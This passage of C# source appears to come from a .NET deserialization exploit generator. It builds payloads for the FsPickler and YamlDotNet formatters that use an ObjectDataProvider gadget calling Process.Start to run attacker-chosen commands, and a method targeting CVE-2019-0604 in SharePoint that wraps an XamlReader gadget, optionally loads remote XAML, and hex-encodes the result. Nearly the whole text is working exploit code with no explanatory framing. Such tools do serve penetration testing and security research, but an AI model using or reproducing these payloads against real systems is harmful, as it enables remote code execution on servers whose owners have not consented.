payload = YamlDocumentMinifier.Minify(payload);
}
if (inputArgs.Test)
{
try
{
SerializersHelper.YamlDotNet_deserialize(payload);
}
catch
{
}
}
return(payload);
}
else if (formatter.ToLower().Equals("fspickler"))
{
inputArgs.CmdType = CommandArgSplitter.CommandType.XML;
String cmdPart;
if (inputArgs.HasArguments)
{
cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String><b:String>{inputArgs.CmdArguments}</b:String>";
}
else
{
cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String>";
}
String internalPayload = @"<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{d:Type c:Process}"" MethodName=""Start"">" + cmdPart + @"</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>";
internalPayload = CommandArgSplitter.JsonStringEscape(internalPayload);
String payload = @"{
""FsPickler"": ""4.0.0"",
""type"": ""System.Object"",
""value"": {
""_flags"": ""subtype"",
""subtype"": {
""Case"": ""NamedType"",
""Name"": ""Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties"",
""Assembly"": {
""Name"": ""Microsoft.PowerShell.Editor"",
""Version"": ""3.0.0.0"",
""Culture"": ""neutral"",
""PublicKeyToken"": ""31bf3856ad364e35""
}
},
""instance"": {
""serializationEntries"": [
{
""Name"": ""ForegroundBrush"",
""Type"": {
""Case"": ""NamedType"",
""Name"": ""System.String"",
""Assembly"": {
""Name"": ""mscorlib"",
""Version"": ""4.0.0.0"",
""Culture"": ""neutral"",
""PublicKeyToken"": ""b77a5c561934e089""
}
},
""Value"": """ + internalPayload + @"""
}
]
}
}
}";
if (inputArgs.Minify)
{
payload = JSONMinifier.Minify(payload, null, null);
}
if (inputArgs.Test)
{
try
{
var serializer = MBrace.CsPickler.CsPickler.CreateJsonSerializer(true);
serializer.UnPickleOfString <Object>(payload);
}
catch
{
}
}
return(payload);
}
else
{
throw new Exception("Formatter not supported");
}
}
public string CVE_2019_0604()
{
/*
* string payloadPart2 = @"<ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"">
* <ExpandedElement/>
* <ProjectedProperty0>
* <MethodName>Parse</MethodName>
* <MethodParameters>
* <anyType xsi:type=""xsd:string"">
* <![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">"+ cmdPart + @"</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]>
* </anyType>
* </MethodParameters>
* <ObjectInstance xsi:type=""XamlReader""></ObjectInstance>
* </ProjectedProperty0>
* </ExpandedWrapperOfXamlReaderObjectDataProvider>";
* //*/
string payloadPart1 = "";
string payloadPart2 = "";
if (useurl)
{
InputArgs inputArgs = new InputArgs();
inputArgs.Cmd = "foobar";
inputArgs.IsRawCmd = true;
inputArgs.ExtraInternalArguments = new List <String> {
"--variant", "3", "--xamlurl", cmd
};
inputArgs.Minify = true;
inputArgs.UseSimpleType = true;
payloadPart1 = typeof(Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties).AssemblyQualifiedName + ":";
payloadPart1 = payloadPart1.Replace(" ", "");
TextFormattingRunPropertiesGenerator myTFRPG = new TextFormattingRunPropertiesGenerator();
payloadPart2 = (string)myTFRPG.GenerateWithNoTest("DataContractSerializer", inputArgs);
}
else
{
payloadPart1 = @"System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35]],System.Data.Services,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089:";
Boolean hasArgs;
string[] splittedCMD = CommandArgSplitter.SplitCommand(cmd, CommandArgSplitter.CommandType.XML, out hasArgs);
String cmdPart;
if (hasArgs)
{
cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{splittedCMD[0]}</b:String><b:String>{splittedCMD[1]}</b:String>";
}
else
{
cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{splittedCMD[0]}</b:String>";
}
payloadPart2 = @"<ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:a=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:b=""http://www.w3.org/2001/XMLSchema""><ExpandedElement/><ProjectedProperty0><MethodName>Parse</MethodName><MethodParameters><anyType a:type=""b:string""><![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">" + cmdPart + @"</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]></anyType></MethodParameters><ObjectInstance a:type=""XamlReader""/></ProjectedProperty0></ExpandedWrapperOfXamlReaderObjectDataProvider>";
}
//payloadPart2 = PayloadMinifier(payloadPart2); // we need to make it smaller as goes bigger after encoding
payloadPart2 = XMLMinifier.Minify(payloadPart2, null, null, FormatterType.DataContractXML, true);
//Console.WriteLine(payloadPart2);
string payload = payloadPart1 + payloadPart2;
Console.WriteLine(payload);
StringBuilder stringBuilder = new StringBuilder();
stringBuilder.Append("__bp");
HexEncode(checked ((char)(payload.Length << 2)), stringBuilder);
HexEncode(payload, stringBuilder);
return(stringBuilder.ToString());
}